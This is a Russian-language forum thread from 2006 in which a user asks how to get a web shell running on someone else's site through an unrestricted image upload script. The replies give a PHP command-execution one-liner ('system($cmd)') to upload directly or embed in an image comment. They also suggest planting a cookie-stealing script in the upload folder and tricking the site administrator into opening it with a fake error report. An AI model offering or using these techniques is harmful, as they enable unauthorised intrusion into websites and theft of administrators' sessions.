Зальем файлы на сайт через get_image.php

Discussion in 'PHP' started by djhoof, 7 May 2006.

  1. djhoof

    djhoof Banned

    Joined:
    7 May 2006
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
    Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..

    Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
    Хотя файлы с другим разрешением открываются.

    Все файлы появляются в папке /www.site.ru/img/

    Какие есть варианты? :)
     
  2. KaMiKadZe

    KaMiKadZe Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    163
    Likes Received:
    35
    Reputations:
    19
    Если так то ничего! Можно попробывать залить вот такую команду
    <? system($cmd);?>
    И потом через неё залить шелл другой который тебе нужен!
    Может и не работать но попробуй!
    Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!
     
  3. xShreKx

    xShreKx Member

    Joined:
    2 Jul 2005
    Messages:
    11
    Likes Received:
    12
    Reputations:
    4
    Вот в чем вся проблема (возможно :) )
    Для папки img присвоены низшие привилегии. А для доступа в остальные папки (www и ниже) могут требоваться root привилегии... Не обладая ими, твой shell не может выполнить определенные команды, поэтому отказывает грузиться. Выход... Даже не знаю... Можешь залить в папку img что-нить снифо-подобное и дать ссылу админу с сообщением об ошибке (ака дорогой администратор site.ru, обратясь по этому адресу www.site.ru/img/admin_kyky.php скрипт выдает ошибку). Так ты можешь получить c00kie$ администратора (если тебе оны нужны/если они вообще там есть =) )... Короче, мути сам =)

    З.Ы.
    Что касается system($cmd); - скорее всего, смысла не будет, т.к. и исполняемые приложения, и папки (где эти приложения находятся) тоже требуют root-a. Но, попытка не пытка =)

    З.З.Ы
    IMHO - не бить ;)
     
    1 person likes this.